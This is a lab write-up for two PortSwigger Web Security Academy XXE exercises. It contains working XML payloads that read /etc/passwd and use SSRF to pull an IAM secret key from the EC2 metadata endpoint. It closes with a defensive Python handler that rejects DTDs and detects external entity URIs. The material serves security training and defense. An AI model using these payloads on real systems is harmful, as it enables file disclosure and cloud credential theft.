XXE - APPRENTICE
tags: Portswigger Web Security Academy
Web
- Description: This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
- Goal: To solve the lab, inject an XML external entity to retrieve the contents of the `/etc/passwd` file.
Lab: Exploiting XXE using external entities to retrieve files
Recon
- Use Burp Suite to intercept the "Check stock" request.
You can see that the request body is an ordinary XML document.
Exp - Inject Directly
Exploit Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
Lab: Exploiting XXE to perform SSRF attacks
- Description: This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response. The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is `http://169.254.169.254/`. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
- Goal: To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.
Recon
- Intercept the "Check stock" request.
From the screenshot of the intercepted request, we noticed that the XML body is client-controlled and can be injected into.
Exp - Inject Directly
Exploit Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
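Both labs succeed because the server's XML parser accepts a DTD and resolves external entities. The fix on the server side is to refuse any DOCTYPE before the parser ever sees it. The following is an added example (not code from the lab or from PortSwigger) of a hardened handler for the `stockCheck` body, run against the two payloads above and a benign request; it assumes UTF-8 request bodies and that `productId`/`storeId` are integers.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: the two lab payloads from this page plus one benign request.
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
FILE_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')
SSRF_XXE = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>'
            b'<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Matches SYSTEM/PUBLIC entity declarations (general or parameter) and captures the URI.
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM\s+|PUBLIC\s+"[^"]*"\s+)"([^"]*)"', re.IGNORECASE)


def external_entity_uris(document: str) -> list:
    """URIs declared by external entities in the DTD; useful for logging/alerting on rejected bodies."""
    return EXTERNAL_ENTITY_RE.findall(document)


def parse_stock_check(raw: bytes) -> dict:
    """Hardened parser for the lab's <stockCheck> body.

    Any DOCTYPE is rejected before parsing, which closes external-entity file reads
    and SSRF as well as internal entity expansion. The remaining fields are then
    validated against the shape the feature actually needs (two integers).
    """
    text = raw.decode("utf-8")  # assumption: request bodies are UTF-8
    if DOCTYPE_RE.search(text):
        raise ValueError("DTD not allowed; external entities: %s" % external_entity_uris(text))
    root = ET.fromstring(raw)
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element %r" % root.tag)
    product, store = root.findtext("productId"), root.findtext("storeId")
    if product is None or store is None or not product.isdigit() or not store.isdigit():
        raise ValueError("productId and storeId must be integers")
    return {"productId": int(product), "storeId": int(store)}


def check(raw: bytes) -> tuple:
    """(accepted, detail) wrapper so a request handler can log the rejection reason."""
    try:
        return True, str(parse_stock_check(raw))
    except (ValueError, ET.ParseError, UnicodeDecodeError) as exc:
        return False, str(exc)
```

Rejecting the whole DTD is simpler and safer than trying to allow "harmless" DTDs; if the feature never needs one, the check belongs as close to the request boundary as possible.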